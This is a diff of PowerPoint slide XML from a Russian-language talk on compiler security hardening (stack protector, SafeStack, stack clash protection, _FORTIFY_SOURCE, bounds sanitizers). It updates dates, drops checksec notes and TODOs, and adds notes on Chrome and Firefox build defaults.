             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -2042,7 +2045,7 @@
           <a:p>
             <a:fld id="{8B51C82C-088A-4FB4-80D3-9F271402ACE7}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/18/2025</a:t>
+              <a:t>7/19/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -2155,7 +2158,7 @@
           <a:p>
             <a:fld id="{8B51C82C-088A-4FB4-80D3-9F271402ACE7}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/18/2025</a:t>
+              <a:t>7/19/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -2466,7 +2469,7 @@
           <a:p>
             <a:fld id="{8B51C82C-088A-4FB4-80D3-9F271402ACE7}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/18/2025</a:t>
+              <a:t>7/19/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -2754,7 +2757,7 @@
           <a:p>
             <a:fld id="{8B51C82C-088A-4FB4-80D3-9F271402ACE7}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/18/2025</a:t>
+              <a:t>7/19/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -2995,7 +2998,7 @@
           <a:p>
             <a:fld id="{8B51C82C-088A-4FB4-80D3-9F271402ACE7}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/18/2025</a:t>
+              <a:t>7/19/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -3874,18 +3877,6 @@
             <a:pPr lvl="1"/>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Проверить можно с помощью утилиты </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>checksec</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
               <a:t>Линкер предупредит при сборке</a:t>
             </a:r>
           </a:p>
@@ -4595,21 +4586,6 @@
                 <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
               </a:rPr>
               <a:t>Bsymbolic</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0">
-              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Можно проверить наличие программой </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>checksec</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" dirty="0">
               <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
@@ -6906,28 +6882,35 @@
           </a:p>
           <a:p>
             <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>TODO: Chrome ?</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Наличие </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>StackProtector</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t> можно проверить программой </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>checksec</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>В </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Chrome </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>дефолтно включён не</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>-strong </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>вариант (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId3"/>
+              </a:rPr>
+              <a:t>BUILD.gn</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>)</a:t>
+            </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -7761,46 +7744,19 @@
               <a:rPr lang="ru-RU" dirty="0"/>
               <a:t>Защита не включена по умолчанию в дистрибутивах</a:t>
             </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Пока не поддержан в checksec (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:hlinkClick r:id="rId2"/>
-              </a:rPr>
-              <a:t>checksec</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId2"/>
-              </a:rPr>
-              <a:t> #301</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Можно просто искать публичный символ </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>__safestack_init</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>)</a:t>
-            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>и браузерах </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Chrome/Firefox</a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" dirty="0"/>
           </a:p>
           <a:p>
             <a:endParaRPr lang="en-US" dirty="0"/>
@@ -8488,7 +8444,7 @@
         <p:spPr/>
         <p:txBody>
           <a:bodyPr>
-            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
+            <a:normAutofit lnSpcReduction="10000"/>
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
@@ -8696,54 +8652,19 @@
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>Checksec</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>пока не обнаруживает </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>stack clash (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:hlinkClick r:id="rId4"/>
-              </a:rPr>
-              <a:t>checksec</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId4"/>
-              </a:rPr>
-              <a:t> #300</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Можно пока использовать </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId5"/>
-              </a:rPr>
-              <a:t>has_stack_clash_protection.py</a:t>
+              <a:t>), </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>а </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Chrome </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>нет</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
@@ -10725,7 +10646,7 @@
             </a:r>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>не умеет анализировать `</a:t>
+              <a:t>не умеет анализировать </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0" err="1"/>
@@ -10733,7 +10654,7 @@
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>`-</a:t>
+              <a:t>-</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
@@ -10910,11 +10831,11 @@
           <a:p>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Работает только в `-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>O` </a:t>
+              <a:t>Работает только в -</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US"/>
+              <a:t>O </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
@@ -11042,24 +10963,48 @@
         </p:spPr>
         <p:txBody>
           <a:bodyPr>
-            <a:normAutofit lnSpcReduction="10000"/>
+            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Для явного включения используются макросы -</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>D_FORTIFY_SOURCE=2 </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>или -</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Для явного включения используются макросы </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>D_FORTIFY_SOURCE=2</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>или </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
               <a:t>D_FORTIFY_SOURCE=3</a:t>
             </a:r>
           </a:p>
@@ -11067,11 +11012,31 @@
             <a:pPr lvl="1"/>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Пока не появится `-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>D_FORTIFY_SOURCE=4` :)</a:t>
+              <a:t>Пока не появится </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>D_FORTIFY_SOURCE=4</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
+              </a:rPr>
+              <a:t></a:t>
             </a:r>
             <a:endParaRPr lang="ru-RU" dirty="0"/>
           </a:p>
@@ -11082,7 +11047,18 @@
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Ubuntu GCC (-D_FORTIFY_SOURCE=3)</a:t>
+              <a:t>Ubuntu GCC (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-D_FORTIFY_SOURCE=3</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>)</a:t>
             </a:r>
           </a:p>
           <a:p>
@@ -11138,10 +11114,20 @@
             </a:r>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>пакеты дефолтно собираются с -</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>пакеты дефолтно собираются с </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
               <a:t>D_FORTIFY_SOURCE=2</a:t>
             </a:r>
           </a:p>
@@ -11157,10 +11143,20 @@
             </a:r>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>с -</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>с </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
               <a:t>D_FORTIFY_SOURCE=3</a:t>
             </a:r>
           </a:p>
@@ -11176,11 +11172,25 @@
             </a:r>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>пакеты дефолтно собираются с -</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>D_FORTIFY_SOURCE=3 (</a:t>
+              <a:t>пакеты дефолтно собираются с </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>D_FORTIFY_SOURCE=3</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> (</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
@@ -11189,6 +11199,32 @@
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
               <a:t>)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Chrome </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>и </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Firefox </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>собираются с </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-D_FORTIFY_SOURCE=2</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -11291,16 +11327,29 @@
               <a:t>Опция </a:t>
             </a:r>
             <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
               <a:t>-</a:t>
             </a:r>
             <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
               <a:t>fsanitize</a:t>
             </a:r>
             <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>=bounds </a:t>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>=bounds</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
@@ -11326,8 +11375,15 @@
               <a:t>Аналог </a:t>
             </a:r>
             <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>_FORTIFY_SOURCE=2: </a:t>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-D_FORTIFY_SOURCE=2</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>: </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
@@ -11388,8 +11444,11 @@
               <a:t>Аналогично </a:t>
             </a:r>
             <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>_FORTIFY_SOURCE=2</a:t>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-D_FORTIFY_SOURCE=2</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -16884,15 +16943,46 @@
           <a:p>
             <a:pPr lvl="1"/>
             <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>TODO: </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>браузеры</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Включён по дефолту в </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Chrome (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId2"/>
+              </a:rPr>
+              <a:t>BUILD.gn</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>)</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t> и </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Firefox (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:hlinkClick r:id="rId3"/>
+              </a:rPr>
+              <a:t>flags.configure</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
         </p:txBody>
@@ -20025,7 +20115,7 @@
         <p:spPr/>
         <p:txBody>
           <a:bodyPr>
-            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
+            <a:normAutofit fontScale="92500"/>
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
@@ -20163,25 +20253,6 @@
               <a:t>)</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>TODO: </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>найти </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>buildflags</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> Firefox</a:t>
-            </a:r>
           </a:p>
           <a:p>
             <a:r>
@@ -21123,7 +21194,7 @@
         <p:spPr/>
         <p:txBody>
           <a:bodyPr>
-            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
+            <a:normAutofit lnSpcReduction="10000"/>
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
@@ -21196,6 +21267,17 @@
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
               <a:t>)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Проверка переполнений дефолтно отключена в </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Rust</a:t>
             </a:r>
           </a:p>
           <a:p>
@@ -21332,142 +21414,25 @@
             <a:pPr lvl="2"/>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Может не обнаруживать некоторые баги, которые успел "перехватить" оптимизатор (особенно под `-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>O2`):</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="1371600" lvl="3" indent="0">
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>// Helge Penne, Secure development with C++ - Lessons and techniques</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="1371600" lvl="3" indent="0">
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>int foo() {</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="1371600" lvl="3" indent="0">
-              <a:buNone/>
-            </a:pPr>
+              <a:t>Может не обнаруживать некоторые баги, которые успел "перехватить" оптимизатор (особенно под </a:t>
+            </a:r>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0">
                 <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                 <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
               </a:rPr>
-              <a:t>  </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>int x = INT_MAX;</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="1371600" lvl="3" indent="0">
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>  </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>int y = x + 1;</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="1371600" lvl="3" indent="0">
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>  </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>if (y &gt; x)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="1371600" lvl="3" indent="0">
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>    </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>return 1;</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="1371600" lvl="3" indent="0">
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>  </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>return 2;</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="1371600" lvl="3" indent="0">
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>}</a:t>
+              <a:t>-</a:t>
+            </a:r>
+            <a:r>
